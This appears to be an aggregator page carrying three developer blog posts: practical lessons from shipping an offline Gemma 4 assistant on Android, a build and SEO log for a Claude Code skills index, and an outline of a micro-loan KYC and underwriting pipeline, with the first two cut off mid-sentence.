> Source: https://dev.to/manoj_shetty/5-things-fluttergemma-doesnt-tell-you-about-shipping-gemma-4-on-android-2koj
> wpnews: https://wpnews.pro/news/5-things-flutter-gemma-doesn-t-tell-you-about-shipping-gemma-4-on-android

The article describes five critical challenges the author encountered while shipping a fully offline Gemma 4 AI assistant (PocketClaw) on Android, which are not covered in standard documentation. Key issues include Gemma 4 E2B's sensitivity to prompt structure—where placing user context at the very beginning of the system prompt is essential for recall—and the failure of standard RAG cosine similarity for generic queries like "summarize the document," requiring heuristic fallbacks. The author provides practical fixes, such as using a slot-filling template for system prompts and implementing a `getDocStarts` fallback for queries with no semantic overlap with document chunks.

*This is a submission for the Gemma 4 Challenge: Write About Gemma 4*

I shipped a Gemma 4 assistant on Android in 17 days. Voice, vision, RAG, eight device actions, everything offline once the model is on device. The project is called PocketClaw, and you can read about it [here](https://dev.to/manoj_shetty/how-i-built-a-fully-offline-ai-assistant-on-android-with-gemma-4-e2b-5a19) if that's what you came for.

This post is about the 5 things I had to figure out the hard way. Not in the `flutter_gemma` README. Not in Google's MediaPipe docs. Not in any of the half-dozen "run Gemma on Android" tutorials I read this week.

If you're about to ship Gemma 4 on Android, I hope this saves you a weekend.

📱 Companion post: [How I built PocketClaw — a fully offline AI assistant on Android with Gemma 4 E2B]. Demo video, architecture deep-dive, full source code.

## 1. Small models drop facts buried mid-prompt. Put what matters at the top.

I've been building agents on Claude and GPT-4 for about 18 months. Both of them handle a long system prompt fine. You can mix instructions and facts in any order, and the model figures out what's a fact versus what's a behavior rule.

Gemma 4 E2B doesn't.

My first system prompt for PocketClaw looked like this:

```
You are Claw. You run locally and offline. You are talking to Manoj Shetty.
Match your answer length to the question. Prefer plain answers over preambles.
Never restate the question. If unsure, say so briefly.
```

User asks "what's my name?" Claw answers "I do not know your name." Every time. The name is sitting right there in sentence three.

I spent about an hour staring at this. My theory after the fact is that "never restate the question" was acting as a dominant instruction, and the model generalized it to "don't reference any user context." That's the kind of overgeneralization a 2B-effective model does. Cloud LLMs don't.

The fix was structural, not lexical:

```
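// Put the user fact first, on its own line, ahead of every behavior rule.
final namePart = (userName != null && userName.trim().isNotEmpty)
    ? "The name of the user is ${userName.trim()}.\n\n"
    : '';
// Instructions follow only after the fact block.
final systemPreamble = '${namePart}You are Claw, ...';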
```

Same fact. Moved to the first line of the prompt. On its own. Flat declarative sentence. Worked the first time I tried it.

The lesson generalizes. When you're working with a 2B-class model, anything you actually want the model to remember goes at the front of the prompt, in simple sentences, with no competing instructions in the same paragraph. The model is paying way more attention to the opening than to the middle. Treat the system prompt like a slot-filling template, not a paragraph.
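The slot-filling idea can be sketched outside Dart as well. The Python below is a minimal illustration, not PocketClaw's code: `build_system_prompt` and its parameters are hypothetical names, and the only rule it encodes is the one from this section (facts first, one flat sentence each, rules after a blank line).

```python
from typing import Optional


def build_system_prompt(user_name: Optional[str], rules: list[str]) -> str:
    """Assemble a system prompt with user facts first and behavior rules after."""
    facts = []
    if user_name and user_name.strip():
        # One flat declarative sentence per fact, nothing else on the line.
        facts.append(f"The name of the user is {user_name.strip()}.")

    sections = []
    if facts:
        sections.append("\n".join(facts))
    # Behavior rules come only after the fact block, separated by a blank line.
    sections.append("\n".join(rules))
    return "\n\n".join(sections)


prompt = build_system_prompt(
    "Manoj Shetty",
    ["You are Claw. You run locally and offline.", "If unsure, say so briefly."],
)
print(prompt)
```

Keeping facts in their own list makes it hard to accidentally bury a new fact inside an instruction paragraph later.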

## 2. Vanilla RAG breaks on the queries users actually type.

If you've worked with RAG before, you know the textbook setup. Chunk the document, embed the chunks, store the vectors, embed the query at retrieval time, find the closest matches. Works great on benchmarks where the queries are specific.

It doesn't work on "summarise the document."

I caught this on Friday. I'd been heads-down for two weeks. I thought I had a working build. I uploaded a PDF I had lying around (a paper on edge LLMs), typed "summarise the document", hit send. Claw said "Summarize the document." back to me. Just that. Like an echo. I tried twice more with different phrasing. Same answer.

Eventually I typed "summarise llmaiedge.pdf" with the actual filename. Got a real summary.

The problem is obvious once you see it. "Summarise the document" has zero semantic overlap with the document text. The PDF doesn't contain the words "summarise" or "this document." Cosine similarity returns nothing useful. The retrieved chunk list is empty. Gemma gets the user's question with no actual document context attached. So it does what any LLM does when starved for context. It hallucinates a generic answer from its training data.

The fix I shipped is two heuristics deep:

```
final isGenericIntent = hits.length <= 1 && (
    lower.contains('summari') ||
    lower.contains('tldr') ||
    lower.contains('explain') ||
    lower.contains('describe') ||
    lower.contains('the document') ||
    lower.contains('the pdf')
);

if (isGenericIntent) {
    hits = await RagService.instance.getDocStarts(
        conversationId: _conversation.id,
    );
}
```

`getDocStarts` is a small fallback method. It runs `searchSimilar` once per indexed doc, using each doc's filename as the query. Filenames are rare distinctive tokens. Every chunk in the vector store has the filename in metadata. So this pulls back real chunks regardless of how the user phrased their question.

Two lines of conditional logic. The difference between "Claw can summarise PDFs" and "Claw echoes your question back at you."

If you're building RAG on Gemma 4 (or any small on-device model really), test it with generic queries before you ship. Your textbook similarity search will fail in ways that look like the model is broken.
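One way to make "test it with generic queries" repeatable is a small routing check that runs before each release. The sketch below mirrors the heuristic from the Dart snippet in Python; the function names and the `"doc_starts"` / `"similarity"` labels are placeholders for illustration, not part of `flutter_gemma` or PocketClaw.

```python
GENERIC_MARKERS = ("summari", "tldr", "explain", "describe", "the document", "the pdf")


def is_generic_intent(query: str, hit_count: int) -> bool:
    """Few retrieval hits plus a generic phrasing marker, as in the heuristic above."""
    lower = query.lower()
    return hit_count <= 1 and any(marker in lower for marker in GENERIC_MARKERS)


def choose_retrieval(query: str, hit_count: int) -> str:
    # "doc_starts" stands in for the filename-based fallback,
    # "similarity" for the normal cosine-similarity path.
    return "doc_starts" if is_generic_intent(query, hit_count) else "similarity"


# Queries worth keeping in a pre-release checklist.
for q in ["summarise the document", "TLDR?", "what does section 3 say about quantization"]:
    print(q, "->", choose_retrieval(q, hit_count=0))
```

The substring match on `summari` covers both British and American spellings, which is presumably why the original checks a stem rather than a whole word.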

## 3. The flutter_gemma plugin bundles ~33 MB of native libraries you probably don't use.

Stock APK for PocketClaw came out at 185 MB. That felt heavy.

When I unzipped it and looked at the native libs (arm64-v8a only, I was already shipping a single-arch build), this is what I saw:

```
26 MB  libllm_inference_engine_jni.so       (needed)
24 MB  libLiteRtLm.so                       (needed)
17 MB  libgemma_embedding_model_jni.so      (don't use — using Gecko)
17 MB  libgecko_embedding_model_jni.so      (needed)
14 MB  libmediapipe_tasks_vision_jni.so     (needed — vision input)
14 MB  libmediapipe_tasks_vision_image_generator_jni.so  (NOT USED)
10 MB  libimagegenerator_gpu.so             (NOT USED)
8  MB  libLiteRtGpuAccelerator.so           (needed)
8  MB  libLiteRtWebGpuAccelerator.so        (NOT USED — Android has OpenCL)
9  MB  libtext_chunker_jni.so               (needed)
```

The image-generation libs are for using Gemma to *generate* images. PocketClaw only *consumes* images (vision input to multimodal Gemma). I'm never going to generate. The WebGPU accelerator is for browsers — Android uses OpenCL. None of it does anything on my target platform.

Four lines in `android/app/build.gradle.kts`:

```
packaging {
    jniLibs {
        excludes.addAll(listOf(
            "**/libimagegenerator_gpu.so",
            "**/libmediapipe_tasks_vision_image_generator_jni.so",
            "**/libLiteRtWebGpuAccelerator.so",
            "**/libLiteRtTopKWebGpuSampler.so"
        ))
    }
}
```

APK dropped from 185 MB to 152 MB. 33 MB cut. Vision input still works, embedder still works, inference still works.

If your use case is similar (chat + vision input + RAG, no image generation), copy these excludes. If your use case is different, say you actually want Gemma to generate images, leave the image-gen libs in. The point is, audit what your plugin pulls in and exclude what you don't use. `flutter_gemma` is built for general capability surface, not minimum-bytes-on-device.
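An audit like this does not need special tooling, because an APK is a zip archive. The following Python sketch lists every native library under `lib/` with its uncompressed size, largest first. The function names are made up for this example, and the APK path in the usage note is an assumption about a default Flutter release build.

```python
import zipfile


def native_libs_by_size(apk_path: str) -> list[tuple[str, int]]:
    """Return (path, uncompressed bytes) for every .so under lib/, largest first."""
    with zipfile.ZipFile(apk_path) as apk:
        libs = [
            (info.filename, info.file_size)
            for info in apk.infolist()
            if info.filename.startswith("lib/") and info.filename.endswith(".so")
        ]
    return sorted(libs, key=lambda item: item[1], reverse=True)


def print_report(apk_path: str) -> None:
    # file_size is the uncompressed size, so totals can exceed the APK size on disk.
    for name, size in native_libs_by_size(apk_path):
        print(f"{size / 1_000_000:6.1f} MB  {name}")
```

Calling `print_report("build/app/outputs/flutter-apk/app-release.apk")` before and after adding excludes gives a quick check that the libraries you meant to drop are actually gone.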

There's a second-order point here that matters more. MediaPipe is the reason `flutter_gemma` is so big. It's also the reason it handles vision and (in 3n's case) audio. Text-focused alternatives like llama.cpp wrappers can ship at 30-60 MB on Android but with much more limited or no multimodal coverage today. So the choice is really: 152 MB with mature vision support, or 60 MB without. There's no free lunch where you get multimodal at the size of a text-only stack. Pick based on what your product actually needs.

## 4. Don't feed the 128K context window. Compact it.

Gemma 4 has a 128K context window. Sounds great in theory. In practice it's a footgun.

Every token in the prompt costs latency at decode time. Every token costs RAM. On a phone, both of those are tight. If you naively shove the whole chat history into context every turn, you'll find that turn 20 takes noticeably longer than turn 5, and turn 50 might OOM the app.

PocketClaw keeps a sliding window of the most recent 24 messages in their raw form. Anything older runs through a compaction pass:

- Extract explicit facts the user has stated ("I am X", "Remember Y", "My name is Z").
- Capture unresolved goals (keywords like "fix", "todo", "issue").
- Compile both into a single lightweight summary paragraph that gets prepended to the prompt as memory.
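The three steps above can be sketched as a single pass over the history. This Python version is an illustration under stated assumptions: the message shape (`role`, `text`), the regex patterns, and the summary wording are all invented here, and only the 24-message window and the keyword examples come from the text.

```python
import re

WINDOW = 24  # most recent messages kept verbatim, as described above
FACT_PATTERNS = (r"\bI am\b", r"\bremember\b", r"\bmy name is\b")
GOAL_KEYWORDS = ("fix", "todo", "issue")


def compact(messages: list[dict]) -> tuple[str, list[dict]]:
    """Split history into a memory summary (older turns) and a raw recent window."""
    older, recent = messages[:-WINDOW], messages[-WINDOW:]
    facts, goals = [], []
    for msg in older:
        if msg["role"] != "user":
            continue
        text = msg["text"]
        if any(re.search(p, text, re.IGNORECASE) for p in FACT_PATTERNS):
            facts.append(text)
        elif any(k in text.lower() for k in GOAL_KEYWORDS):
            goals.append(text)
    parts = []
    if facts:
        parts.append("Known facts: " + " ".join(facts))
    if goals:
        parts.append("Open goals: " + " ".join(goals))
    # The summary string is what would be prepended to the prompt as memory.
    return " ".join(parts), recent
```

Keyword matching this crude will miss facts and catch some noise, so treat it as a starting point for the idea rather than a tuned extractor.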

That's the chat part. The aggressive part is image handling.

A typical user-uploaded photo is roughly 1 MB. As base64 in a prompt, that's around 30,000 tokens. That's a quarter of the entire 128K context window for one image. If the user uploads three photos across a conversation, your context budget is in trouble.

So PocketClaw does this: when an image message slides past the 24-message boundary, the raw image bytes get deleted from memory. What's preserved is the assistant's prior textual description of that image:

```
String _imageMemoryFromAssistant({
  required String? imageName,
  required String assistantText,
}) {
  final label = imageName ?? 'uploaded image';
  return 'Assistant previously described $label as: '
         '${_shorten(assistantText, 1000)}';
}
```

So Claw still "remembers" what it saw, but only the description goes through the prompt. The 30,000-token base64 blob becomes a 100-token summary. That's roughly a 300x compression of image memory.

The kicker: this works really well for the kind of follow-up questions users actually ask. "What was in that photo I sent earlier?" is answerable from the description alone. The model rarely needs the pixels back. If it does, the user can re-upload.

The general pattern here is: don't think of the context window as "free space up to the limit." Think of it as a budget. Spend it on things the model needs *for the current turn*. Everything else gets compacted to a textual summary.

## 5. Whether audio works in `flutter_gemma` depends on your model file, not the Gemma version.

This one I want you to know so you don't spend a day chasing the wrong thing like I did.

Gemma 4 E2B's model card lists native audio as a supported modality. So I thought: cool, I'll skip the speech-to-text plugin entirely, feed raw audio bytes straight to Gemma, get a single multimodal call instead of an STT-then-LLM pipeline. Cleaner.

I dug into `flutter_gemma` v0.15.1 source. The plugin's documentation consistently frames audio as a Gemma 3n E4B feature:

```
/// [supportAudio] — whether the model supports audio (Gemma 3n E4B only).
bool supportAudio = false,
```

That phrasing shows up in eight different files in the plugin. The interface, the API docs, the example app, the native Android side — they all treat audio as 3n territory.

But here's what's interesting once you read further. There is no hardcoded model-version check anywhere in the plugin. The actual gate is just `if (config.supportAudio == true)`. So what's really limiting audio isn't the Dart code rejecting Gemma 4; it's whether the model file you downloaded actually contains the audio encoder.

The example app's `model.dart` has the clearest hint:

```
supportAudio: true,  // .litertlm files have TF_LITE_AUDIO_ENCODER
supportAudio: false, // .task files don't have audio encoder
```

So the real question for any model you want to use with audio isn't "is it Gemma 3n?" It's "does my `.litertlm` file include the audio encoder for this model?" The plugin's docs assume the answer is yes only for Gemma 3n E4B because that's what's been tested and shipped that way. For Gemma 4 E2B, the model card says audio is supported by the model itself, but I haven't found a `.litertlm` build of E2B that bundles the encoder. If one ships, the plugin should handle it, since there's no version gate to stop it.

For PocketClaw I went with Android's system STT (the `speech_to_text` package). Practical reasons. I get live transcription as the user speaks (text appears word by word while they're holding the mic). That's a noticeably better UX than the "hold, speak, release, wait" pattern you'd get from on-model audio. And it side-steps the question of whether my specific E2B `.litertlm` file

---
## How I Indexed 2,000 Claude Code Skills (And What the Install Data Says About AI Coding in 2026)

> Published: 2026-05-24 04:57:53+00:00
> Source: https://dev.to/shenhuang/how-i-indexed-2000-claude-code-skills-and-what-the-install-data-says-about-ai-coding-in-2026-3k80
> wpnews: https://wpnews.pro/news/how-i-indexed-2000-claude-code-skills-and-what-the-install-data-says-about-ai-in

The article describes how the author built a ranked, filterable index of nearly 2,000 public Claude Code skills at orangebot.ai/skills, addressing the lack of a searchable, install-weighted directory in the official registry. The author explains their deliberately simple technical stack—a single JSON file updated by a daily cron job and served by a Next.js page—to minimize operational overhead and avoid database complexity. The post also details an SEO crisis where Google was indexing the page but showing a low 0.12% click-through rate due to missing metadata and empty client-side rendering, which the author diagnosed and began fixing.

## The problem: 2,000 skills, no map

Claude Code skills exploded across 2025 and into 2026. The official registry at [skills.sh](https://skills.sh) and the parallel ecosystem on GitHub now expose well over 2,000 public skills, covering everything from `frontend-design` patterns to `azure-deploy` to `nano-banana-pro` image generation. The format won. Every serious AI coding agent (Claude Code, Cursor, OpenSeek, Codex) now ships some flavor of "loadable context package".

But there is no ranked, install-weighted, searchable index. The registry lists skills alphabetically, paginates them across dozens of pages, and doesn't surface install volume in a way you can sort. You discover a useful skill one of three ways: someone tweets it, you scroll forever, or you already know the author/repo combo. None of those scale past a few hundred skills.

So I built one. [orangebot.ai/skills](https://orangebot.ai/skills) is a ranked, filterable index of 1,998 public Claude Code skills sorted by weekly install volume, tagged by domain, with individual detail pages for the top 50 highest-installed entries. It is the page I wanted six months ago and didn't have.

This post is the build log. Three parts: the stack (boring on purpose), the SEO crisis I walked into and the fix that shipped today, and what the install data actually says about where AI coding tools are headed in 2026.

Source registry: [skills.sh](https://skills.sh). The catalog: [orangebot.ai/skills](https://orangebot.ai/skills).

## The stack (zero infrastructure surprises)

I picked the most boring stack I could justify, on purpose. The catalog is not where I want to spend operational attention — the data pipeline and the SEO are.

- **Next.js 16 App Router**. Server Components by default so Google sees real HTML, not a JS shell. Routing is filesystem-based, the metadata API is built in.
- **Firebase App Hosting**. `git push` deploys. No manual ops, no Docker, no Kubernetes. Free tier so far.
- **Cron on a Linux box at home**. A Python scraper runs daily on `lich-ubuntu`, normalizes install counts and author attribution, and writes a single ~2.5MB `skills_index.json` to the repo's `public/data/` directory. When the file changes, the next deploy picks it up.
- **No database at request time**. The Next.js page reads the JSON at revalidate time (every 6 hours). Firebase serves the rendered HTML. No Postgres, no Redis, no Firestore call on the hot path.

That's the whole architecture. One JSON file, one Next.js page, one daily cron. The catalog routes in the repo:

```
src/app/skills/page.js              # SSR catalog (server component)
src/app/skills/SkillsClient.js      # interactive island (search/filter/sort)
src/app/skills/[category]/page.js   # domain filter pages
src/app/s/[id]/page.js              # individual skill detail page (top 50)
public/data/skills_index.json       # 1,998 entries, ~2.5MB
```

Honest disclosure on the data freshness: `skills_index.json` is regenerated weekly-ish during active development as I iterate on the parser. The production cron (a separate Python service on `lich-ubuntu`) is what stabilizes it to daily; that part is still rolling out. So treat the snapshot as recent, not "fresh this morning".

The decision I keep being asked about is "why not a database". Two reasons. First, the catalog is read-mostly and changes once a day: that is the canonical shape of a static JSON file, not a row store. Second, every database I'd add is a thing that can break at 2am while I'm asleep. A JSON file in `public/` cannot break. It can be wrong, but it cannot be down.
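For readers who want to copy the "one JSON file" approach, the write step is where most of the care goes. The sketch below is not the author's scraper. It is a hypothetical `write_index_if_changed` helper showing two habits that suit this design: deterministic output so unchanged data produces no diff, and an atomic rename so a crashed run never leaves a half-written file. The `installs` and `name` field names are assumptions.

```python
import json
import os
import tempfile


def write_index_if_changed(skills: list[dict], path: str) -> bool:
    """Write the index atomically; return False when the content is unchanged."""
    # Stable ordering and key order keep the output byte-identical across runs.
    ordered = sorted(skills, key=lambda s: (-s.get("installs", 0), s.get("name", "")))
    payload = json.dumps(ordered, sort_keys=True, ensure_ascii=False, indent=1)

    if os.path.exists(path):
        with open(path, encoding="utf-8") as f:
            if f.read() == payload:
                return False  # nothing to commit, so no new deploy

    # Write to a temp file in the same directory, then rename over the target.
    directory = os.path.dirname(path) or "."
    fd, tmp_path = tempfile.mkstemp(dir=directory, suffix=".tmp")
    with os.fdopen(fd, "w", encoding="utf-8") as f:
        f.write(payload)
    os.replace(tmp_path, path)
    return True
```

A cron wrapper can use the boolean to decide whether to commit and push at all, which keeps deploys tied to real data changes.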

The pillar guide that links into the catalog lives at [orangebot.ai/blog/claude-code-skills-guide](https://orangebot.ai/blog/claude-code-skills-guide). It's the long-form companion — what skills are, how to install them, when to pick a skill vs an MCP server.

## The SEO crisis I didn't see coming

Six months after the catalog went live, I finally opened Google Search Console. The numbers were ugly.

- **21 of 186 known URLs indexed. 11.3%.**
- 151 URLs sitting in "Discovered – currently not indexed". `last_crawled` timestamps were the 1969-12-31 Unix epoch: Google had registered the URLs from my sitemap and then never bothered to fetch them.
- The `/skills` page alone was getting **5,651 impressions per week** but a **0.12% CTR**. People were seeing the page in search results, then bouncing past it.

That is the failure mode for a content site. I had built the catalog, written the pillar guide, submitted the sitemap, and Google's verdict was a polite "no thanks". The 5,651 impressions were good news in disguise: the demand was real; the page just couldn't convert it because the SERP snippet was the generic brand tagline (no `generateMetadata`) and the rendered HTML was an empty client shell.

I spent a day diagnosing it instead of pushing more content. Three root causes:

**Root cause 1: the catalog page was a client component.** The top of `src/app/skills/page.js` had `'use client'`. The server-rendered HTML was an empty `<div>`. Googlebot does run JS, eventually, but it queues JS-heavy pages on a much slower second pass, and for low-authority sites it often skips the second pass entirely. So Google saw a blank page, picked up the brand-tagline title from the root layout, and ranked accordingly.

**Root cause 2: sitemap pollution.** Next.js App Router auto-generates routes from `metadata` files like `opengraph-image.js`, `twitter-image.js`, `icon.js`. My `next-sitemap.config.js` was pulling all of them into `sitemap.xml`, plus eight stale scaffold routes I never finished (`/cjobs`, `/mnews`, `/jobmatch`, `/jobs`, `/datajobs`, `/photographer`, `/prop`, `/startups`). Google saw 173 sitemap entries, found ~18 weren't HTML and another 8 returned thin/empty pages, and started treating the whole sitemap as low-trust.

**Root cause 3: the homepage didn't link to /skills, /tools, or /digest in visible HTML.** The nav was inside a `<details>` element that collapsed by default. Googlebot reads `<details>` content fine, but the absence of a prominent above-the-fold internal link to /skills meant the catalog was getting near-zero internal PageRank from the homepage.

Three causes, four commits.

## The fix: 4 commits, ~180 file-changes (shipped 2026-05-23)

Four commits today, between 11:15 and 18:59 PDT: `e9b4ba0` (SSR-ify /skills /tools /news, clean sitemap, add hub nav), `d09e0e4` (CTR titles, EEAT author page, 5 tools SSR, news sitemap), `4442629` (P1+P2 push: 5 more tools SSR, deep compare pages, blog framework + 8 posts), `505ec1d` (P3 push: 23 tools SSR, 50 skill detail pages, hub depth, OG image, newsletter). Cumulative session touched ~180 file-changes across the four commits per the P3 commit message.

**Commit 1 — convert /skills and the other hub routes from client components to a server-shell + client-island pattern.** This is the generally useful pattern I'd recommend to anyone running into the same problem. The shape is:

```jsx
// src/app/skills/page.js  — Server Component (NO 'use client')
import fs from 'node:fs/promises';
import path from 'node:path';
import SkillsClient from './SkillsClient';

export const revalidate = 21600; // 6 hours

export const metadata = {
  title: '2,000+ Best Claude Code Skills (2026): Top Skills by Installs & Stars',
  description: 'A working library of Claude Code skills from across GitHub...',
  alternates: { canonical: '/skills' },
};

export default async function SkillsPage() {
  const raw = await fs.readFile(
    path.join(process.cwd(), 'public', 'data', 'skills_index.json'),
    'utf-8'
  );
  const allSkills = JSON.parse(raw);
  const topSkills = [...allSkills]
    .sort((a, b) => (b.installs || 0) - (a.installs || 0))
    .slice(0, 60);

  const itemListJsonLd = {
    '@context': 'https://schema.org',
    '@type': 'ItemList',
    numberOfItems: topSkills.length,
    itemListElement: topSkills.map((s, i) => ({
      '@type': 'ListItem',
      position: i + 1,
      name: s.name,
      url: s.repository,
    })),
  };

  return (
    <>
      <script
        type="application/ld+json"
        dangerouslySetInnerHTML={{ __html: JSON.stringify(itemListJsonLd) }}
      />
      <details>
        <summary>Text view · {allSkills.length} skills</summary>
        <h1>Claude Code Skills Index</h1>
        <ol>
          {topSkills.map((s) => (
            <li key={`${s.source}-${s.skillId}`}>
              <a href={s.repository}><strong>{s.name}</strong></a>
              {' '}by @{s.source} — {s.weeklyInstalls} installs/wk
            </li>
          ))}
        </ol>
      </details>
      <SkillsClient />
    </>
  );
}
```

The trick: the server emits the real top-60 list inside a `<details>` block (collapsed for users, fully readable for crawlers) plus a JSON-LD `ItemList` schema, and only then mounts the interactive `<SkillsClient />`. Google indexes the static list. Users get the interactive shell. Both reads are served from the same render.

**Commit 2: clean the sitemap.** Excluded `/*/opengraph-image`, `/*/twitter-image`, `/*/icon`, `/feed.xml`, `/feed.json`, `/feed/*`, `/api/*`, and the eight stale scaffold routes from `next-sitemap.config.js`. Sitemap went 173 → 154 (cleanup), then later commits added `/blog/*` posts and 50 `/s/[id]` detail pages, bringing it to **219 URLs today**. All current entries return HTML with `<title>` and `<meta description>`.
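The exclusion rules are easy to check offline before trusting a regenerated sitemap. Here is a rough Python sketch that applies the same patterns to a list of paths. It uses the standard library's `fnmatch`, whose glob semantics may differ in edge cases from whatever matcher `next-sitemap` uses, so treat it as a sanity check rather than a mirror of the real config. `keep_in_sitemap` is a name invented for this example.

```python
from fnmatch import fnmatchcase

# Glob patterns and stale routes as listed in the text above.
EXCLUDE_PATTERNS = [
    "/*/opengraph-image", "/*/twitter-image", "/*/icon",
    "/feed.xml", "/feed.json", "/feed/*", "/api/*",
]
STALE_ROUTES = {
    "/cjobs", "/mnews", "/jobmatch", "/jobs",
    "/datajobs", "/photographer", "/prop", "/startups",
}


def keep_in_sitemap(path: str) -> bool:
    """True when a URL path survives both the stale-route and pattern filters."""
    if path in STALE_ROUTES:
        return False
    return not any(fnmatchcase(path, pattern) for pattern in EXCLUDE_PATTERNS)


paths = ["/skills", "/blog/opengraph-image", "/api/subscribe", "/jobs", "/s/find-skills"]
print([p for p in paths if keep_in_sitemap(p)])
```

Running a check like this over the generated `sitemap.xml` paths in CI would catch a future metadata route leaking back in.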

**Commit 3: visible homepage nav.** Added a `<nav aria-label="Site sections">` block at the top of the homepage with plain anchor tags to `/skills`, `/tools`, `/digest`, `/news`, `/blog`, `/sources`, `/topics`, `/year/2026`, `/compare`. No `<details>`, no JS, no collapse. Boring. Crawlable.

**Commit 4: depth on /tools, /blog, /s/[id], OG images, newsletter.** SSR'd 33 of 36 tool pages (each with HowTo / FAQPage / SoftwareApplication / BreadcrumbList JSON-LD), shipped 13 blog posts as the editorial layer, built 50 individual `/s/[id]` skill detail pages, added a dynamic `next/og` card per blog post, and embedded Substack signup on every post page.

Expected D7 trajectory (forecast, not measured; post deploys today): indexed URLs **30-40** by 2026-05-30, **60-80** by 2026-06-06. The new `/skills` title, "2,000+ Best Claude Code Skills (2026): Top Skills by Installs & Stars", replaces the generic brand tagline that was driving the 0.12% CTR. I'll update this post with measured GSC numbers once the D7 pull lands.

## What the install data says about AI coding in 2026

The catalog gives a daily-updated view into which skills people actually install. Here is the top 10 by weekly installs, pulled directly from `skills_index.json`:

| Rank | Skill | Author | Installs |
|---|---|---|---|
| 1 | find-skills | vercel-labs/skills | 753,732 |
| 2 | vercel-react-best-practices | vercel-labs/agent-skills | 256,738 |
| 3 | frontend-design | anthropics/skills | 212,072 |
| 4 | web-design-guidelines | vercel-labs/agent-skills | 206,584 |
| 5 | remotion-best-practices | remotion-dev/skills | 182,063 |
| 6 | azure-ai | microsoft/github-copilot-for-azure | 146,196 |
| 7 | azure-deploy | microsoft/github-copilot-for-azure | 145,787 |
| 8 | azure-storage | microsoft/github-copilot-for-azure | 145,752 |
| 9 | azure-cost-optimization | microsoft/github-copilot-for-azure | 145,752 |
| 10 | azure-diagnostics | microsoft/github-copilot-for-azure | 145,697 |

Four things jump out.

**find-skills is #1 with 753K weekly installs.** A meta-skill (a skill whose only job is to discover other skills) outranks every domain-specific skill in the index by roughly 3x. The discovery layer is the actual moat. That's the thesis behind this entire catalog. The #1 skill is published by `vercel-labs/skills`, not Anthropic, which is itself a tell about who is racing to own the discovery primitive. Detail page: [orangebot.ai/s/find-skills](https://orangebot.ai/s/find-skill

---
## Architecting Instant Micro-Loans: Data Pipelines and KYC Automation

> Published: 2026-05-24 04:57:28+00:00
> Source: https://dev.to/loaneligstatus/architecting-instant-micro-loans-data-pipelines-and-kyc-automation-27oj
> wpnews: https://wpnews.pro/news/architecting-instant-micro-loans-data-pipelines-and-kyc-automation

The article describes a modern micro-lending architecture that processes loan applications in under 90 seconds using event-driven data pipelines, KYC automation, and machine learning. It details how the system ingests user data through APIs, validates identity via registries like UIDAI, and parses alternative data sources such as bank statements and device telemetry to compute risk scores. The underwriting process combines ensemble models like XGBoost and LSTM networks, with explainability provided through SHAP values, to enable rapid decisions for urgent small-ticket loans.

Modern micro-lending platforms process loan applications in under 90 seconds by orchestrating event-driven data pipelines, regulatory-compliant KYC automation, and machine learning-powered underwriting. For a typical ₹1,000 instant loan, the system ingests user consent signals, validates identity through API federations, parses alternate data sources, computes risk scores, and triggers bank disbursals via account aggregator frameworks.
The reference architecture follows a hexagonal design with clear separation between ingestion, processing, decision, and fulfillment layers. Apache Kafka serves as the backbone for real-time event streaming, while Kubernetes-orchestrated microservices handle individual concerns. All components maintain audit logs in immutable storage to satisfy RBI guidelines on digital lending.
Data flows begin when a user authenticates through the mobile app using OAuth 2.1 and grants explicit consent via Account Aggregator (AA) frameworks like Finvu or OneMoney. This consent triggers a cascade of events across secured channels.
Ingestion starts with a high-throughput API gateway built on Kong or AWS API Gateway. User-provided information—PAN, Aadhaar number (masked), phone, and bank account—lands in a validation service that performs synchronous checks against CKYC registry and UIDAI e-KYC endpoints.
Alternate data parsing forms the core differentiation. The pipeline consumes device telemetry (with consent), SMS permissions for bank statement parsing, and consented GST or electricity bill data. Custom Apache NiFi or AWS Glue jobs normalize unstructured inputs: PDF bank statements are OCR-processed using Tesseract with custom LSTM post-correction models, then parsed into structured transaction graphs using rule engines and graph databases like Neo4j.
These events publish to Kafka topics partitioned by user_id and risk_tier. Spark Streaming or Flink applications consume these streams for feature engineering—calculating velocity of transactions, merchant category entropy, and repayment capacity proxies. Features land in a feature store (Feast or custom Redis + PostgreSQL) with TTL-based versioning for reproducibility.
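Two of the features named above are simple enough to show directly. The sketch below gives one plausible definition of each in plain Python, outside any Spark or Flink job. The function names, the per-day normalization, and the trailing-window convention are assumptions made for illustration, since the text does not define the features precisely.

```python
import math
from collections import Counter


def merchant_category_entropy(categories: list[str]) -> float:
    """Shannon entropy (bits) of the merchant-category distribution."""
    if not categories:
        return 0.0
    total = len(categories)
    return -sum((n / total) * math.log2(n / total) for n in Counter(categories).values())


def transaction_velocity(timestamps: list[float], window_seconds: float) -> float:
    """Transactions per day within the trailing window ending at the latest event."""
    if not timestamps:
        return 0.0
    latest = max(timestamps)
    recent = [t for t in timestamps if latest - t <= window_seconds]
    return len(recent) / (window_seconds / 86_400)
```

Low entropy means spending concentrated in a few categories, while high entropy means it is spread out. Either can be informative depending on how the downstream model is trained.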
KYC automation eliminates manual verification queues. Upon consent, the system calls UIDAI's e-KYC API with encrypted Aadhaar details, receiving XML responses containing demographic data and photograph. Face matching runs via AWS Rekognition or open-source DeepFace models, achieving sub-300ms latency with 99.2% accuracy thresholds.
For video KYC (required for higher ticket sizes), WebRTC streams feed into liveness detection models that analyze micro-expressions and challenge-response prompts. All PII routes through Vault for secrets management and encryption at rest using AES-256 with customer-managed keys.
Deduplication logic queries a Cassandra cluster using fuzzy matching on name + DOB + address embeddings generated by Sentence-BERT models. Matches above 0.85 cosine similarity flag for manual review, though under 3% of applications reach this stage in mature systems.
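The threshold rule itself is small. As a minimal sketch, assuming embeddings are already computed and passed in as plain float lists, the check could look like the following. The helper names are hypothetical, and a production system would use an approximate nearest-neighbor index rather than a linear scan.

```python
import math

REVIEW_THRESHOLD = 0.85  # from the text: matches above this go to manual review


def cosine_similarity(a: list[float], b: list[float]) -> float:
    """Cosine of the angle between two equal-length vectors; 0.0 if either is zero."""
    dot = sum(x * y for x, y in zip(a, b))
    norm = math.sqrt(sum(x * x for x in a)) * math.sqrt(sum(y * y for y in b))
    return dot / norm if norm else 0.0


def needs_manual_review(candidate: list[float], existing: list[list[float]]) -> bool:
    """True when any stored embedding is more similar than the review threshold."""
    return any(cosine_similarity(candidate, e) > REVIEW_THRESHOLD for e in existing)
```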
The underwriting service represents the decision heart. It aggregates features from the feature store, runs them through an ensemble of models: XGBoost for traditional credit factors, LSTM networks for transaction sequence modeling, and graph neural networks for social or merchant network risk.
